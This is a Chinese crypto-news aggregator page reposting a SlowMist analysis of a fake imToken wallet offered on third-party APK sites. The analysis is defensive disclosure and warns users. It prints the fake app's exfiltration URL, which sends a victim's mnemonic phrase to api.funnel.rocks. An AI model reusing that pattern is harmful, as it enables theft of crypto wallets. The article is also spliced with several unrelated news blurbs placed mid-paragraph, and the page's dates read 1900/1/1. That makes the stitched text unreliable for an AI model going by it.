木星链 木星链
Ctrl+D收藏木星链
首页 > MANA > 正文

WEB:Web3 假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

作者:

时间:1900/1/1 0:00:00

慢雾安全团队建议使用钱包、交易所时请认准官方下载渠道并从多方进行验证。

原文:https://foresightnews.pro/article/h5Detail/31716

作者:山&耀

转自:ForesightNews

背景

基于区块链技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。

当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包「登录」;这与我们传统意义上的「登录」不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行「登录」,我们可以看到「登录」钱包时显示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而钱包是你在Web3世界中的唯一通行证。

欧易Web3钱包将支持ETHW链上资产管理及交易:9月5日,据欧易OKX官方公告,欧易Web3钱包将对以太坊合并升级可能产生的分叉资产予以支持,用户可将以太坊链上资产充值至欧易Web3钱包。若分叉成功,欧易Web3钱包将在分叉后的12小时内,支持包括ETHW主网币、其他Token、NFT等多种资产。

据悉,欧易Web3钱包将开放查看和管理ETHW链资产和交易,支持与ETHW上的DApp连接钱包并进行交互。此外,欧易Web3钱包仅支持ETHW链上NFT展示。[2022/9/5 13:09:58]

俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。

在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?

加密货币教父David Chaum:xx network是Web3隐私龙头:据官方消息,近日,加密货币教父David Chaum表示,xx network是Web3隐私龙头,xx network由加密货币教父、密码学家David Chaum创立,其去中心化隐私通信工具xx messenger(xx信使)全球下载量已突破40万+。该应用可在苹果AppStore和安卓商店下载,具有群组聊天和照片、音频等分享功能。

据官方介绍,xx network由分布式网络节点组进行信息传输,最大限度地保护用户信息和隐私安全。xx messenger是首个真正保护发送方和接收方之间通信的dApp,支持端对端加密,元数据不会被第三方收集和破坏。

xx network提供了一个受保护的数字世界,用户可以通过它以安全和隐私的方式分享想法和交换价值。[2022/8/2 2:52:34]

网站分析

Web3社交协议Light推出v1.0版本,并将于三季度推出社交钱包:6月27日消息,基于CyberConnect搭建的Web3社交协议Light宣布推出v1.0版本,并将于今年三季度推出社交钱包。社交钱包将内嵌Web3原生组件,帮助用户简化Web3流程。[2022/6/27 1:33:37]

鉴于下载途径众多,我们今天以apkcombo为例看看,apkcombo是一个第三方应用市场,它提供的应用据官方说大部分来源于其他正规应用商店,但事实是否真如官方所说呢?

我们先看下apkcombo的流量有多大:

据数据统计站点similarweb统计,apkcombo站点:

全球排名:1,809国家排名:7,370品类排名:168我们可以看到它的影响力和流量都非常大。它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W:

加密和Web 3社区对BuzzFeed人肉搜索BAYC创始人身份表达不满:2月7日消息,美国互联网媒体和娱乐公司 Buzzfeed 近日公布了无聊猿BAYC 两位联合创始人Gargamel和Gordon Goner的真实身份,分别是:32 岁的作家兼编辑 Greg Solano 和 35 岁的 Wylie Aronow,但此举引发了加密和 Web 3 社区的不满,他们抨击相关报道是人肉搜索,而不是适当的新闻消息。知名 Twitter 加密大 VCobie 在推文中直指 Buzzfeed 是典型的垃圾,相关报道是为了点击和广告收入而对当事人进行人肉搜索,而 Messari 创始人 Ryan Selkis 也对 Buzzfeed 的行为表达了愤怒。

不过,发表相关文章的 Buzzfeed 记者 Kate Notopoulos 辩称道:在传统商业世界中,公司的首席执行官或创始人使用真实姓名而不是化名是有原因的,BAYC 背后的人正在吸引投资者并经营一家潜在价值达到数十亿美元的企业,如果你不知道他们是谁,如果出现问题又该如何追究他们的责任?[2022/2/7 9:35:25]

那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:https://play.google.com/store/apps/details?id=im.token.app

声音 | Nick Szabo:图灵完备区块链不是“世界电脑”或“Web3.0”:智能合约先驱Nick Szabo今日表示,从规模上看图灵完备区块链是一个处理极其昂贵且信任最小化计算的平台,而不是“世界电脑”或“Web3.0”。通过非常认真的编写以及非常小的无库程序,图灵完备区块链将适合大额金融智能合约。对此,ETC官方团队评论称,这同样是目前最符合ETC的定义。[2018/7/6]

由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。而apkcombo镜像站的下载路径为:https://apkcombo.com/downloader/#package=im.token.app

上图我们可以发现,apkcombo提供的版本为24.9.11,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。

在编写本文时imToken钱包的最新版本为2.11.3,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。

如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如:uptodown下载地址:https://imtoken.br.uptodown.com/android

我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:

钱包分析

在之前我们已经分析过不少假钱包的案例,如:2021-11-24我们披露:《慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。

我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:

根据逆向APK代码和实际分析流量包发现,助记词发送方式:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

看下图,最早的「api.funnel.rocks」证书出现在2022-06-03,也就是攻击开始的大概时间:

俗话说一图胜千言,最后我们画一个流程图:

总结

目前这种局活动不仅活跃,甚至有扩大范围的趋势,每天都有新的受害者受。用户作为安全体系最薄弱的环节,应时刻保持怀疑之心,增强安全意识与风险意识,当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。

同时,如需使用钱包,请务必认准以下主流钱包App官方网址:

imToken钱包:https://token.im/TokenPocket钱包:https://www.tokenpocket.pro/TronLink钱包:https://www.tronlink.org/比特派钱包:https://bitpie.com/MetaMask钱包:https://metamask.io/TrustWallet:https://trustwallet.com/请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。

致谢:感谢在溯源过程中imToken官方提供的验证支持。

由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。

?

标签:WEBWEB3COMKENWeb3游戏web3.0币种comc币价格3X Long Chainlink Token

MANA热门资讯
加密货币:行情开启复苏阶段,当下如何埋伏低筹码币种?

随着加密货币市场的复苏,我们审视有前途的潜力币,以底部价格进行投资!获胜策略建议在牛市开始前买入.

1900/1/1 0:00:00
Kcoin:关于支持Band Protocol(BAND)网络升级的公告

亲爱的用户:币安将支持BandProtocol的网络升级,具体安排如下:币安预计将于东八区时间2023年04月27日21:00暂停BAND代币的充值、提现业务.

1900/1/1 0:00:00
GAT:Gate Learn 知識接力,閱讀分享最高賺$1000

GateLearn開展閱讀分享接力,了解加密貨幣的世界並輕鬆賺得豐厚獎勵!來打開加密貨幣世界的大門!点击进入Learn主页点击进入Course主页活動時間:2023年4月26日12:00-202.

1900/1/1 0:00:00
EXT:xToken (XTK)

一、项目简介?xToken是一个致力于构建Web3综合资本市场平台的全球团队。二、代币信息代币名称:xToken代币符号:XTK代币类型:ERC20总供给量:1,000,000,000XTK?三.

1900/1/1 0:00:00
SHI:如果您投资1,000镁,柴犬SHIB删除一个零,您能赚多少?

ShibaInu正在交易具有四个“零”的指数,并且在过去18个月中努力删除一个“零”。SHIB在2021年10月打破了“零”,在3天内飙升1,000%,达到0.00008616美元的历史新高.

1900/1/1 0:00:00
DOGE:如果价格继续下跌,370亿的DOGE将面临无利可图的风险

如果原始meme硬币的价格跌破0.0745美元的水平,它可能会看到过多的狗狗币地址,并且370亿个DOGE将失去盈利能力.

1900/1/1 0:00:00